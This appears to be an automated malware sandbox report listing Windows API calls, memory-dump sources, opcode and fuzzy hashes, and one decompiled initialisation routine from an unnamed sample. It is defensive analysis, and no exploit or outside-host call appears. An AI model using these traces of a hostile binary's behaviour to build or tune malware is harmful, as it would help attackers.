                              • Opcode Fuzzy Hash: bfb2d3f3fd7da22b1690034b3ee82532b682e2a9acd70b2c9cdfa030ffad03f5
                              • Instruction Fuzzy Hash: E211D672600269FFEB305F68CCC4EEE7FADEB453A0F058565FA91A7180D6B19C4087A4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrChrA.SHLWAPI(?,0000002C), ref: 0103C485
                              • StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 0103C49E
                              • StrTrimA.SHLWAPI(?,?), ref: 0103C4C6
                              • StrTrimA.SHLWAPI(00000000,?), ref: 0103C4D5
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 0103C50C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Trim$FreeHeap
                              • String ID:
                              • API String ID: 2132463267-0
                              • Opcode ID: 6d18d91bad58c37c573a70cae4be200a5225058e80c794557f8b2a8b51b92777
                              • Instruction ID: 0396d49d4b2e5475207b69bb82fda91f058515beb4c0824ed3f8239d7ab12f09
                              • Opcode Fuzzy Hash: 6d18d91bad58c37c573a70cae4be200a5225058e80c794557f8b2a8b51b92777
                              • Instruction Fuzzy Hash: 8711B676240316BBE7219B5CDEC8FAB7BADEB84790F140062BA85D7184DB75D840C750
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualProtect.KERNEL32(00000000,00000004,00000040,?,03AE75A8,?,?,00000000,00000000,?,0103F3BE,00000000,00000000,0102E91C,00000000,0104FF8C), ref: 0104705D
                              • VirtualProtect.KERNEL32(00000000,00000004,?,?,?,0103F3BE,00000000,00000000,0102E91C,00000000,0104FF8C,00000008,00000003), ref: 0104708D
                              • RtlEnterCriticalSection.NTDLL(01050460), ref: 0104709C
                              • RtlLeaveCriticalSection.NTDLL(01050460), ref: 010470BA
                              • GetLastError.KERNEL32(?,0103F3BE,00000000,00000000,0102E91C,00000000,0104FF8C,00000008,00000003), ref: 010470CA
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                              • String ID:
                              • API String ID: 653387826-0
                              • Opcode ID: 0b1511fbfd00a091d4a83dba65575e56cd6417c74ae98641370cc601326f3676
                              • Instruction ID: 927e5b271540c51d4eba63ce42b5a73d5e1632b13cb3c62a315f95f97066a71c
                              • Opcode Fuzzy Hash: 0b1511fbfd00a091d4a83dba65575e56cd6417c74ae98641370cc601326f3676
                              • Instruction Fuzzy Hash: 2F21C4F9600B05EFD761DFA8C984A5ABBF8FB08310B008669EA9697610DB75E904CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 0102D098
                              • GetLastError.KERNEL32 ref: 0102D0BB
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0102D0CE
                              • GetLastError.KERNEL32 ref: 0102D0D9
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0102D121
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                              • String ID:
                              • API String ID: 1671499436-0
                              • Opcode ID: facb2ad7e0bd7a64195c80ab99328e4ecfe09161046effcdefbbd55907216e88
                              • Instruction ID: 7f65c0e9dd3b2e45768df06ec118bca2158c0c5eb9e4e134a12855f27fd5ceda
                              • Opcode Fuzzy Hash: facb2ad7e0bd7a64195c80ab99328e4ecfe09161046effcdefbbd55907216e88
                              • Instruction Fuzzy Hash: CD218B74600214FBEB719FA8DDC8B5E7BB9FB00359F604098F682964A4C37A9D858B10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(01044E4B,?,?,?,?,00000008,01044E4B,00000000,?), ref: 01044F1C
                              • memcpy.NTDLL(01044E4B,?,00000009,?,?,?,?,00000008,01044E4B,00000000,?), ref: 01044F3E
                              • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 01044F56
                              • lstrlenW.KERNEL32(00000000,00000001,01044E4B,?,?,?,?,?,?,?,00000008,01044E4B,00000000,?), ref: 01044F76
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,01044E4B,00000000,?), ref: 01044F9B
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                              • String ID:
                              • API String ID: 3065863707-0
                              • Opcode ID: 58475af58f4856265f59f878a91878b77741de2010a4bef6586102382272d975
                              • Instruction ID: 429652390c18d467d93c9cb485b1a4e7e52702aefd5b0b8d677b79baa380506b
                              • Opcode Fuzzy Hash: 58475af58f4856265f59f878a91878b77741de2010a4bef6586102382272d975
                              • Instruction Fuzzy Hash: 3B116379E41208FBDB219FA4D849FCE7FB8AB48711F008065FA85E7284D6799608CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrcmpi.KERNEL32(00000000,?), ref: 01034708
                              • RtlEnterCriticalSection.NTDLL(01050488), ref: 01034715
                              • RtlLeaveCriticalSection.NTDLL(01050488), ref: 01034728
                              • lstrcmpi.KERNEL32(010504A0,00000000), ref: 01034748
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01022A18,00000000), ref: 0103475C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                              • String ID:
                              • API String ID: 1266740956-0
                              • Opcode ID: c24879f0bf6985283e6566b2feac5c63b6a9542392fb83edd001234a536b3531
                              • Instruction ID: 8e0dcbf63bd7164bfa11ef8cc555e8d924b2f86bc962c19dc801fe390ec258d1
                              • Opcode Fuzzy Hash: c24879f0bf6985283e6566b2feac5c63b6a9542392fb83edd001234a536b3531
                              • Instruction Fuzzy Hash: 9311AF71600205EFDB55CF58C889AAEBBACFF45324F044159F895D7244DB399D04CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,00000000,01048C1F,?,010212D8,?), ref: 010428BF
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • lstrcpy.KERNEL32(00000000,?), ref: 010428E3
                              • StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,010212D8,?), ref: 010428EA
                              • lstrcpy.KERNEL32(00000000,?), ref: 01042932
                              • lstrcat.KERNEL32(00000000,?), ref: 01042941
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                              • String ID:
                              • API String ID: 2616531654-0
                              • Opcode ID: 6543d0aeb6b3df7380e239ca0b2ceab53cafe42602439e774c9510eea53da116
                              • Instruction ID: 51c6e390a7f7a9f07b3512234a027244b569a009685b8f95a6a332ac80a59d02
                              • Opcode Fuzzy Hash: 6543d0aeb6b3df7380e239ca0b2ceab53cafe42602439e774c9510eea53da116
                              • Instruction Fuzzy Hash: 101191BA3002069BE731DE69E9C8F7BBBECAB84790F050468F6C9C3104EB759805C765
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0102C05C: lstrlen.KERNEL32(00000000,00000000,?,00000000,0102BDA2,00000000,00000000,00000000,00000000), ref: 0102C068
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0102F582
                              • memcpy.NTDLL(00000000,?,?), ref: 0102F595
                              • RtlEnterCriticalSection.NTDLL(01050488), ref: 0102F5A6
                              • RtlLeaveCriticalSection.NTDLL(01050488), ref: 0102F5BB
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0102F5F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                              • String ID:
                              • API String ID: 2349942465-0
                              • Opcode ID: b5d44d2b6ee458cd57d1d27f0bd4d9410beca4e9c165cfa45f4ec27b0b9c9912
                              • Instruction ID: aeefd214f1a6a2e99df2177607f768394164b7461df7ba61cdb4c32a954cd6ee
                              • Opcode Fuzzy Hash: b5d44d2b6ee458cd57d1d27f0bd4d9410beca4e9c165cfa45f4ec27b0b9c9912
                              • Instruction Fuzzy Hash: 0911E5BA241322EFD3615F18DC84C6F7BADEF85361B05456AF9C293218CA3A5C05CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,00000000,?,?,?,01024811,?,?,00000000), ref: 01028728
                              • lstrlen.KERNEL32(?,?,?,?,01024811,?,?,00000000), ref: 0102872F
                              • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 0102873D
                                • Part of subcall function 01026BCF: GetLocalTime.KERNEL32(?,?,0103A620,00000000,00000001), ref: 01026BD9
                                • Part of subcall function 01026BCF: wsprintfA.USER32 ref: 01026C0C
                              • wsprintfA.USER32 ref: 0102875F
                                • Part of subcall function 0102A182: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,01028787,00000000,?,00000000,00000000,00000006,00000000), ref: 0102A1A0
                                • Part of subcall function 0102A182: wsprintfA.USER32 ref: 0102A1C5
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,00000000), ref: 01028790
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                              • String ID:
                              • API String ID: 3847261958-0
                              • Opcode ID: fe75bec1df1fc422e5793cec32ba4c1b5eddf87d332a13660586aa35b4d59088
                              • Instruction ID: e4d58c9f4e2459b653022b8c0a711549cc15f6a6c2224665b16e37b40fc4270b
                              • Opcode Fuzzy Hash: fe75bec1df1fc422e5793cec32ba4c1b5eddf87d332a13660586aa35b4d59088
                              • Instruction Fuzzy Hash: 3601A179240228BFDB611F29DC44D9F7FAEFB80360F008022FE5996214D63B8921CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 0103D25A
                                • Part of subcall function 01024AFE: wcstombs.NTDLL ref: 01024BBC
                              • lstrlen.KERNEL32(?,?,?,?,?,010427DF,?,?), ref: 0103D27D
                              • lstrlen.KERNEL32(?,?,?,?,010427DF,?,?), ref: 0103D287
                              • memcpy.NTDLL(?,?,00004000,?,?,010427DF,?,?), ref: 0103D298
                              • HeapFree.KERNEL32(00000000,?,?,?,?,010427DF,?,?), ref: 0103D2BA
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heaplstrlen$AllocateFreememcpywcstombs
                              • String ID:
                              • API String ID: 1256246205-0
                              • Opcode ID: f9a35b996ae1af3de879df78b8a53f1ff566e127b48244c332166bb47a6c9aac
                              • Instruction ID: 69075dd92c310502f578e2d49b7f20f9723fca0c84e15459d62ec54fc468e42a
                              • Opcode Fuzzy Hash: f9a35b996ae1af3de879df78b8a53f1ff566e127b48244c332166bb47a6c9aac
                              • Instruction Fuzzy Hash: 8C117CB9600204EFDB619F95DC44F5E7BF9EB95320F504064F585A3214D636DD109B20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 010334A4: lstrlen.KERNEL32(0102EFEF,747DF560,00000000,?,00000000,0103BF21,?,00000000,?,?,0102EFEF,00000020), ref: 010334B3
                                • Part of subcall function 010334A4: mbstowcs.NTDLL ref: 010334CF
                              • lstrlenW.KERNEL32(00000000,747DF560,00000000,?,00000000,?,?,0102EFEF,00000020), ref: 0103BF30
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0103BF42
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0102EFEF,00000020), ref: 0103BF5F
                              • lstrlenW.KERNEL32(00000000,?,?,0102EFEF,00000020), ref: 0103BF6B
                              • HeapFree.KERNEL32(00000000,00000000,?,?,0102EFEF,00000020), ref: 0103BF7F
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                              • String ID:
                              • API String ID: 3403466626-0
                              • Opcode ID: 20bf57a37da6a5b316421a9cb866776f36ada86e33bacd9b2ff2bff83f6933d0
                              • Instruction ID: 2b29ea2ed5aff63d124d415dba910e7a3954b114d48c004111e3c9d64148f174
                              • Opcode Fuzzy Hash: 20bf57a37da6a5b316421a9cb866776f36ada86e33bacd9b2ff2bff83f6933d0
                              • Instruction Fuzzy Hash: 3E018CB6200204FFD7219F98ED84F9E7BACEF49314F004061F685D7258CB7A9904CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleA.KERNEL32(?,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 010254D7
                              • GetProcAddress.KERNEL32(00000000,?), ref: 010254F0
                              • OpenProcess.KERNEL32(00000400,00000000,01033B88,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 0102550D
                              • IsWow64Process.KERNEL32(00000000,00000000,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 0102551E
                              • CloseHandle.KERNEL32(00000000,?,?,01033B88,00000000,010501F4,?,00000000), ref: 01025531
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HandleProcess$AddressCloseModuleOpenProcWow64
                              • String ID:
                              • API String ID: 4157061983-0
                              • Opcode ID: 1a34fefcb089cfea86f3f1e5f9f6b92ec495748220bc85bf9697bcbd36d65321
                              • Instruction ID: fb01a0bd95aeef19030bbbe9c211f121619b293d85a177fcca87326d051fac20
                              • Opcode Fuzzy Hash: 1a34fefcb089cfea86f3f1e5f9f6b92ec495748220bc85bf9697bcbd36d65321
                              • Instruction Fuzzy Hash: 98018475940228EFCB21DF69DD488EEBBF9FB4438171041AAF689D3108E73A5A01CF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleA.KERNEL32 ref: 01033CF3
                              • GetModuleHandleA.KERNEL32 ref: 01033D01
                              • LoadLibraryExW.KERNEL32(?,?,?), ref: 01033D0E
                              • GetModuleHandleA.KERNEL32 ref: 01033D25
                              • GetModuleHandleA.KERNEL32 ref: 01033D31
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HandleModule$LibraryLoad
                              • String ID:
                              • API String ID: 1178273743-0
                              • Opcode ID: 4ff7a4075e76734fdac5478fe496d3f0b0845a5166a6fd8a8a7c3c96396c3ee2
                              • Instruction ID: b211661935ddbfc241b669904fa1e5528fb60327f294db646a852e7a7d2dfb2f
                              • Opcode Fuzzy Hash: 4ff7a4075e76734fdac5478fe496d3f0b0845a5166a6fd8a8a7c3c96396c3ee2
                              • Instruction Fuzzy Hash: 9A018BB87002069F9B516F6DED84A6A7FA9FF552A07040036F998C2125EB66CC208B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,0104784E), ref: 0103F56E
                              • StrTrimA.SHLWAPI(00000001,?,?,0104784E), ref: 0103F591
                              • StrTrimA.SHLWAPI(00000000,?,?,0104784E), ref: 0103F5A0
                              • _strupr.NTDLL ref: 0103F5A3
                              • lstrlen.KERNEL32(00000000,0104784E), ref: 0103F5AB
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Trim$_struprlstrlen
                              • String ID:
                              • API String ID: 2280331511-0
                              • Opcode ID: 1001e19c8141287f3880f19429ffbdb71c5efa6f59fa578ac4656cd0564500ab
                              • Instruction ID: d539e1a0194003a573dfa820005bac5a97c88777c5bd48792466783db8e24804
                              • Opcode Fuzzy Hash: 1001e19c8141287f3880f19429ffbdb71c5efa6f59fa578ac4656cd0564500ab
                              • Instruction Fuzzy Hash: 6AF0C275300116AFE7259B28E8C8F7F77ACEB88750F100029F4C5C7288DF699C018761
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlEnterCriticalSection.NTDLL(01050460), ref: 0103E6AD
                              • RtlLeaveCriticalSection.NTDLL(01050460), ref: 0103E6BE
                              • VirtualProtect.KERNEL32(00000001,00000004,00000040,0000007F,?,?,010321BF,00000000,010501F4,01050488,01025BD7,00000003,?,?,0103738E,00000000), ref: 0103E6D5
                              • VirtualProtect.KERNEL32(00000001,00000004,0000007F,0000007F,?,?,010321BF,00000000,010501F4,01050488,01025BD7,00000003,?,?,0103738E,00000000), ref: 0103E6EF
                              • GetLastError.KERNEL32(?,?,010321BF,00000000,010501F4,01050488,01025BD7,00000003,?,?,0103738E,00000000,?,010501F4), ref: 0103E6FC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                              • String ID:
                              • API String ID: 653387826-0
                              • Opcode ID: 17e1c60303e448a364068beb2ecb8996354f5730c76899d7712ee393d0559de2
                              • Instruction ID: c26c3e1ddcd73986cf19590f7579b3a3bd8fbeb4e4d4fc516e537b9c671bba9c
                              • Opcode Fuzzy Hash: 17e1c60303e448a364068beb2ecb8996354f5730c76899d7712ee393d0559de2
                              • Instruction Fuzzy Hash: D1018FB9200304EFD7219F18C844E6AB7F9EF89320B104628EA8293250D771ED018F24
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 010279B7
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,0102FCCC,00000000,?), ref: 010279C7
                              • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,0102FCCC,00000000,?), ref: 010279D0
                              • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,0103FBB5,?,?,00000040,?,?,?,?,?,?,0102FCCC), ref: 010279EE
                              • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,0103FBB5,?,?,00000040,?,?,?,?,?,?,0102FCCC), ref: 010279FB
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                              • String ID:
                              • API String ID: 3667519916-0
                              • Opcode ID: 4852005db30271f4b782853ea70f7686cb3ce87c08044d7b2e6210a31b150377
                              • Instruction ID: c6bf5548a559be87de954c9125bb674470a29b8899b6d909e9a75f65ee785d1f
                              • Opcode Fuzzy Hash: 4852005db30271f4b782853ea70f7686cb3ce87c08044d7b2e6210a31b150377
                              • Instruction Fuzzy Hash: 62F09AB5340710AFE7306A3D9D88F1AB6ECBF58350F100629F6C2D2990CB29E805CA20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0103DA5A,?), ref: 010322F8
                              • GetVersion.KERNEL32 ref: 01032307
                              • GetCurrentProcessId.KERNEL32 ref: 0103231E
                              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 0103233B
                              • GetLastError.KERNEL32 ref: 0103235A
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                              • String ID:
                              • API String ID: 2270775618-0
                              • Opcode ID: 7af500df7061be252b858d9d99e8b10bd8f9b7805d8ade08723b645a84285c57
                              • Instruction ID: 4cb248ef76af9a68fddf8127a61f03aba7795d912d1b998e2dc7d4a781adda73
                              • Opcode Fuzzy Hash: 7af500df7061be252b858d9d99e8b10bd8f9b7805d8ade08723b645a84285c57
                              • Instruction Fuzzy Hash: F2F049B4780301EFE7708F28AA4971E3BA8B745B40F108519FACADA1CCD77A94418F1A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E2CBF(intOrPtr _a4) {
                              				void* _t2;
                              				long _t4;
                              				void* _t5;
                              				long _t6;
                              				void* _t7;
                              				void* _t13;
                              
                              				_t2 = CreateEventA(0, 1, 0, 0);
                              				 *0x13ed2a4 = _t2;
                              				if(_t2 == 0) {
                              					return GetLastError();
                              				}
                              				_t4 = GetVersion();
                              				if(_t4 != 5) {
                              					L4:
                              					if(_t13 <= 0) {
                              						_t5 = 0x32;
                              						return _t5;
                              					}
                              					L5:
                              					 *0x13ed294 = _t4;
                              					_t6 = GetCurrentProcessId();
                              					 *0x13ed290 = _t6;
                              					 *0x13ed29c = _a4;
                              					_t7 = OpenProcess(0x10047a, 0, _t6);
                              					 *0x13ed28c = _t7;
                              					if(_t7 == 0) {
                              						 *0x13ed28c =  *0x13ed28c | 0xffffffff;
                              					}
                              					return 0;
                              				}
                              				if(_t4 > 0) {
                              					goto L5;
                              				}
                              				_t13 = _t4 - _t4;
                              				goto L4;
                              			}

                              Statement addresses for the listing above, one per source line in order (0x00000000 marks lines such as labels and closing braces that carry no instruction of their own): 0x013e2cc7, 0x013e2ccf, 0x013e2cd4, 0x00000000, 0x013e2d29, 0x013e2cd6, 0x013e2cde, 0x013e2ce6, 0x013e2ce6, 0x013e2d26, 0x00000000, 0x013e2d26, 0x013e2ce8, 0x013e2ce8, 0x013e2ced, 0x013e2cff, 0x013e2d04, 0x013e2d0a, 0x013e2d12, 0x013e2d17, 0x013e2d19, 0x013e2d19, 0x00000000, 0x013e2d20, 0x013e2ce2, 0x00000000, 0x00000000, 0x013e2ce4, 0x00000000

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,013E233B,?), ref: 013E2CC7
                              • GetVersion.KERNEL32 ref: 013E2CD6
                              • GetCurrentProcessId.KERNEL32 ref: 013E2CED
                              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 013E2D0A
                              • GetLastError.KERNEL32 ref: 013E2D29
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                              • String ID:
                              • API String ID: 2270775618-0
                              • Opcode ID: 6711f39f2633d109c0b1b4d4b1d91f3c6de52707cf0c68919d0642b28c59a9fb
                              • Instruction ID: 6f5aefaddfad66935d7604cf9abfd4826016df8c9ca9034e15fa917bdec0c5d6
                              • Opcode Fuzzy Hash: 6711f39f2633d109c0b1b4d4b1d91f3c6de52707cf0c68919d0642b28c59a9fb
                              • Instruction Fuzzy Hash: 4DF04F71A403199EE7718FA8AD0D76B3FEDB705765F104515E616CE2C8D771C8018F25
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • InterlockedIncrement.KERNEL32(010500D0), ref: 010242C6
                              • InterlockedDecrement.KERNEL32(010500D0), ref: 0102437A
                              • GetLastError.KERNEL32(?,?), ref: 010247F0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Interlocked$DecrementErrorIncrementLast
                              • String ID: t
                              • API String ID: 3567740241-2238339752
                              • Opcode ID: fefb3618b638a8fc57382bd7e3249bd192f8396952f9ce2de49d5e8ab8aa9fdd
                              • Instruction ID: 0cd28038d3fbdf867fef5b2bdc6804c5f8fe55c8e93ba9886fdf9a75cd18e855
                              • Opcode Fuzzy Hash: fefb3618b638a8fc57382bd7e3249bd192f8396952f9ce2de49d5e8ab8aa9fdd
                              • Instruction Fuzzy Hash: 0601F4767406169BFB219E7C9C88B6F3AE1FB92724F120921F9EAC70C0DBB6C4148711
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • InterlockedIncrement.KERNEL32(010500D4), ref: 0102430A
                              • InterlockedDecrement.KERNEL32(010500D0), ref: 0102437A
                              • GetLastError.KERNEL32(?,?), ref: 010247F0
                                • Part of subcall function 01043F93: StrChrA.SHLWAPI(?,0000002C), ref: 01043FE2
                                • Part of subcall function 01043F93: StrTrimA.SHLWAPI(00000001,?), ref: 01043FFB
                                • Part of subcall function 01043F93: StrChrA.SHLWAPI(?,0000002C), ref: 01044006
                                • Part of subcall function 01043F93: StrTrimA.SHLWAPI(00000001,?), ref: 0104401F
                                • Part of subcall function 01043F93: lstrlen.KERNEL32(?), ref: 010440B7
                                • Part of subcall function 01043F93: RtlAllocateHeap.NTDLL(00000000,?), ref: 010440D9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: InterlockedTrim$AllocateDecrementErrorHeapIncrementLastlstrlen
                              • String ID: t
                              • API String ID: 3211259430-2238339752
                              • Opcode ID: 25a8b00badf2b5996ec213dd397f87bddfdbb6ed0a2728a5f3b33fed5d396cb0
                              • Instruction ID: 1d3add039439ea193818f195011b4c7925505e7f731877a22b0845caa5f51532
                              • Opcode Fuzzy Hash: 25a8b00badf2b5996ec213dd397f87bddfdbb6ed0a2728a5f3b33fed5d396cb0
                              • Instruction Fuzzy Hash: C7F046773405119FE711AE7C9C88F6F3AD5F791720F120921FAEACB080EA76C4008721
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • InterlockedIncrement.KERNEL32(010500D8), ref: 01024348
                              • InterlockedDecrement.KERNEL32(010500D0), ref: 0102437A
                              • GetLastError.KERNEL32(?,?), ref: 010247F0
                                • Part of subcall function 01043F93: StrChrA.SHLWAPI(?,0000002C), ref: 01043FE2
                                • Part of subcall function 01043F93: StrTrimA.SHLWAPI(00000001,?), ref: 01043FFB
                                • Part of subcall function 01043F93: StrChrA.SHLWAPI(?,0000002C), ref: 01044006
                                • Part of subcall function 01043F93: StrTrimA.SHLWAPI(00000001,?), ref: 0104401F
                                • Part of subcall function 01043F93: lstrlen.KERNEL32(?), ref: 010440B7
                                • Part of subcall function 01043F93: RtlAllocateHeap.NTDLL(00000000,?), ref: 010440D9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: InterlockedTrim$AllocateDecrementErrorHeapIncrementLastlstrlen
                              • String ID: t
                              • API String ID: 3211259430-2238339752
                              • Opcode ID: 52b06fd1902ee2abd698065706cd6e0627355c24e464f6bb0e9a4d21a8ff8549
                              • Instruction ID: 448bc051f088724452ec879b6d72bf214f9d6a85f52e2c7e72e3859f6e13450f
                              • Opcode Fuzzy Hash: 52b06fd1902ee2abd698065706cd6e0627355c24e464f6bb0e9a4d21a8ff8549
                              • Instruction Fuzzy Hash: 86F0F6777406115BE7519E7C9C88F6F36D5F792720F160921F9EADB084EA66C8008721
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • InterlockedDecrement.KERNEL32(0000001C), ref: 0102B77C
                              • HeapFree.KERNEL32(00000000,?,77E34620,?,?,010429F2,00000000), ref: 0102B797
                              • HeapFree.KERNEL32(00000000,00000000,?,?,010429F2,00000000), ref: 0102B7A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FreeHeap$DecrementInterlocked
                              • String ID: t
                              • API String ID: 2942576174-2238339752
                              • Opcode ID: d301c54969ce36b4a32cf859bfb4518f1790753cad7f177cbdf414ba6cec5f69
                              • Instruction ID: d298c194e7de53af29218e2b06ee46a5338959fbc929f58c51eb65e6e69c6230
                              • Opcode Fuzzy Hash: d301c54969ce36b4a32cf859bfb4518f1790753cad7f177cbdf414ba6cec5f69
                              • Instruction Fuzzy Hash: 20D09EB5640325BBDBB15F61ED48E5B7F7DFB44750F000061F64992029D72BA861DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • HeapFree.KERNEL32(00000000,?), ref: 0102CC80
                              • HeapFree.KERNEL32(00000000,?), ref: 0102CC91
                              • HeapFree.KERNEL32(00000000,?), ref: 0102CCA9
                              • CloseHandle.KERNEL32(?), ref: 0102CCC3
                              • HeapFree.KERNEL32(00000000,?), ref: 0102CCD8
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
